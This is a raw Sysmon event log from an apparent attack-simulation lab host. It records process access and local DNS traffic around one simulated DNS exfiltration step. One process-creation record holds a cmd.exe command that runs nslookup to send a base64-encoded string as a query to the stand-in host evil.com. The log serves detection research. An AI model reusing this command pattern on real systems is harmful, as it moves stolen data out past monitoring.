14:21:47.219{2E1864BB-18FB-629A-C545-000000005F02}56084636C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-C645-000000005F02}7988C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000214222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.753{00000000-0000-0000-0000-000000000000}7080<unknown process>-udpfalsefalse127.0.0.1-51176-false127.0.0.1-53domain 354300x8000000000000000214221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.753{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51176- 354300x8000000000000000214220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.753{00000000-0000-0000-0000-000000000000}7080<unknown process>-udptruefalse127.0.0.1-51176-false127.0.0.1-53domain 354300x8000000000000000214219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.753{00000000-0000-0000-0000-000000000000}7080<unknown process>-udpfalsefalse127.0.0.1-51175-false127.0.0.1-53domain 354300x8000000000000000214218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.752{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51175- 354300x8000000000000000214217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.659{00000000-0000-0000-0000-000000000000}7232<unknown process>-udpfalsefalse127.0.0.1-51174-false127.0.0.1-53domain 354300x8000000000000000214216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.659{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51174- 354300x8000000000000000214215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.659{00000000-0000-0000-0000-000000000000}7232<unknown process>-udptruefalse127.0.0.1-51174-false127.0.0.1-53domain 354300x8000000000000000214214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.658{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51173- 354300x8000000000000000214213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.658{00000000-0000-0000-0000-000000000000}7232<unknown process>-udptruefalse127.0.0.1-51173-false127.0.0.1-53domain 354300x8000000000000000214212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.658{00000000-0000-0000-0000-000000000000}7232<unknown process>-udpfalsefalse127.0.0.1-51172-false127.0.0.1-53domain 354300x8000000000000000214211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.658{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51172- 354300x8000000000000000214210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.657{00000000-0000-0000-0000-000000000000}7232<unknown process>-udptruefalse127.0.0.1-51172-false127.0.0.1-53domain 354300x8000000000000000214209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.534{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51171- 354300x8000000000000000214208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.533{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51170- 354300x8000000000000000214207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.532{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51169- 354300x8000000000000000214206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.532{00000000-0000-0000-0000-000000000000}6024<unknown process>-udptruefalse127.0.0.1-51169-false127.0.0.1-53domain 354300x8000000000000000214205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.419{00000000-0000-0000-0000-000000000000}7368<unknown process>-udpfalsefalse127.0.0.1-51168-false127.0.0.1-53domain 354300x8000000000000000214204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.418{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51168- 354300x8000000000000000214203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.418{00000000-0000-0000-0000-000000000000}7368<unknown process>-udptruefalse127.0.0.1-51168-false127.0.0.1-53domain 10341000x8000000000000000214202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.203{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.203{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.203{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.203{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000214198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.337{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51167- 10341000x8000000000000000214197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.203{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-C645-000000005F02}7988C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.203{2E1864BB-18FB-629A-C445-000000005F02}76202600C:\Windows\system32\cmd.exe{2E1864BB-18FB-629A-C645-000000005F02}7988C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000214195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.337{00000000-0000-0000-0000-000000000000}4552<unknown process>-udptruefalse127.0.0.1-51167-false127.0.0.1-53domain 354300x8000000000000000214194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.336{00000000-0000-0000-0000-000000000000}4552<unknown process>-udpfalsefalse127.0.0.1-51166-false127.0.0.1-53domain 354300x8000000000000000214193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.336{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51166- 354300x8000000000000000214192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.336{00000000-0000-0000-0000-000000000000}4552<unknown process>-udptruefalse127.0.0.1-51166-false127.0.0.1-53domain 154100x8000000000000000214191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.215{2E1864BB-18FB-629A-C645-000000005F02}7988C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FB-629A-C445-000000005F02}7620C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpqh.tmp 2>&1 354300x8000000000000000214190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.336{00000000-0000-0000-0000-000000000000}4552<unknown process>-udpfalsefalse127.0.0.1-51165-false127.0.0.1-53domain 354300x8000000000000000214189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.336{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51165- 354300x8000000000000000214188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.336{00000000-0000-0000-0000-000000000000}4552<unknown process>-udptruefalse127.0.0.1-51165-false127.0.0.1-53domain 354300x8000000000000000214187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.260{00000000-0000-0000-0000-000000000000}5124<unknown process>-udpfalsefalse127.0.0.1-51164-false127.0.0.1-53domain 354300x8000000000000000214186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.260{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51164- 354300x8000000000000000214185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.260{00000000-0000-0000-0000-000000000000}5124<unknown process>-udptruefalse127.0.0.1-51164-false127.0.0.1-53domain 354300x8000000000000000214184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.260{00000000-0000-0000-0000-000000000000}5124<unknown process>-udpfalsefalse127.0.0.1-51163-false127.0.0.1-53domain 354300x8000000000000000214183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.260{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51163- 354300x8000000000000000214182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.260{00000000-0000-0000-0000-000000000000}5124<unknown process>-udptruefalse127.0.0.1-51163-false127.0.0.1-53domain 354300x8000000000000000214181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.260{00000000-0000-0000-0000-000000000000}5124<unknown process>-udpfalsefalse127.0.0.1-51162-false127.0.0.1-53domain 354300x8000000000000000214180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.259{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51162- 354300x8000000000000000214179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.259{00000000-0000-0000-0000-000000000000}5124<unknown process>-udptruefalse127.0.0.1-51162-false127.0.0.1-53domain 354300x8000000000000000214178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.185{00000000-0000-0000-0000-000000000000}4040<unknown process>-udpfalsefalse127.0.0.1-51161-false127.0.0.1-53domain 354300x8000000000000000214177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.185{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51161- 354300x8000000000000000214176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.185{00000000-0000-0000-0000-000000000000}4040<unknown process>-udptruefalse127.0.0.1-51161-false127.0.0.1-53domain 354300x8000000000000000214175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.185{00000000-0000-0000-0000-000000000000}4040<unknown process>-udpfalsefalse127.0.0.1-51160-false127.0.0.1-53domain 354300x8000000000000000214174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.185{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51160- 354300x8000000000000000214173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.185{00000000-0000-0000-0000-000000000000}4040<unknown process>-udptruefalse127.0.0.1-51160-false127.0.0.1-53domain 354300x8000000000000000214172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.185{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51159- 354300x8000000000000000214171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.184{00000000-0000-0000-0000-000000000000}4040<unknown process>-udptruefalse127.0.0.1-51159-false127.0.0.1-53domain 354300x8000000000000000214170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.095{00000000-0000-0000-0000-000000000000}6160<unknown process>-udpfalsefalse127.0.0.1-51158-false127.0.0.1-53domain 354300x8000000000000000214169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.095{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51158- 354300x8000000000000000214168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.095{00000000-0000-0000-0000-000000000000}6160<unknown process>-udptruefalse127.0.0.1-51158-false127.0.0.1-53domain 354300x8000000000000000214167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.095{00000000-0000-0000-0000-000000000000}6160<unknown process>-udpfalsefalse127.0.0.1-51157-false127.0.0.1-53domain 354300x8000000000000000214166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.095{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51157- 354300x8000000000000000214165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.095{00000000-0000-0000-0000-000000000000}6160<unknown process>-udptruefalse127.0.0.1-51157-false127.0.0.1-53domain 354300x8000000000000000214164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.094{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51156- 354300x8000000000000000214163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.995{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51155- 354300x8000000000000000214162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.994{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51154- 354300x8000000000000000214161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.993{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51153- 354300x8000000000000000214160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.901{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51152- 354300x8000000000000000214159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.901{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51151- 354300x8000000000000000214158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.901{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51150- 354300x8000000000000000214157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.806{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51149- 354300x8000000000000000214156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.806{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51148- 354300x8000000000000000214155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.806{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51147- 354300x8000000000000000214154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.726{00000000-0000-0000-0000-000000000000}6652<unknown process>-udptruefalse127.0.0.1-51146-false127.0.0.1-53domain 354300x8000000000000000214153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.726{00000000-0000-0000-0000-000000000000}6652<unknown process>-udpfalsefalse127.0.0.1-51145-false127.0.0.1-53domain 354300x8000000000000000214152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.726{00000000-0000-0000-0000-000000000000}6652<unknown process>-udptruefalse127.0.0.1-51145-false127.0.0.1-53domain 354300x8000000000000000214151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.726{00000000-0000-0000-0000-000000000000}6652<unknown process>-udpfalsefalse127.0.0.1-51144-false127.0.0.1-53domain 354300x8000000000000000214150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.726{00000000-0000-0000-0000-000000000000}6652<unknown process>-udptruefalse127.0.0.1-51144-false127.0.0.1-53domain 354300x8000000000000000214149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.644{00000000-0000-0000-0000-000000000000}3300<unknown process>-udpfalsefalse127.0.0.1-51143-false127.0.0.1-53domain 354300x8000000000000000214148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.643{00000000-0000-0000-0000-000000000000}3300<unknown process>-udptruefalse127.0.0.1-51142-false127.0.0.1-53domain 354300x8000000000000000214147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.563{00000000-0000-0000-0000-000000000000}5404<unknown process>-udpfalsefalse127.0.0.1-51140-false127.0.0.1-53domain 354300x8000000000000000214146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.563{00000000-0000-0000-0000-000000000000}5404<unknown process>-udptruefalse127.0.0.1-51140-false127.0.0.1-53domain 354300x8000000000000000214145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.451{00000000-0000-0000-0000-000000000000}8012<unknown process>-udpfalsefalse127.0.0.1-51137-false127.0.0.1-53domain 354300x8000000000000000214144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.351{00000000-0000-0000-0000-000000000000}6372<unknown process>-udptruefalse127.0.0.1-51134-false127.0.0.1-53domain 354300x8000000000000000214143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.238{00000000-0000-0000-0000-000000000000}5836<unknown process>-udpfalsefalse127.0.0.1-51133-false127.0.0.1-53domain 10341000x8000000000000000214142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.181{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-C545-000000005F02}5608C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.181{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-C545-000000005F02}5608C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 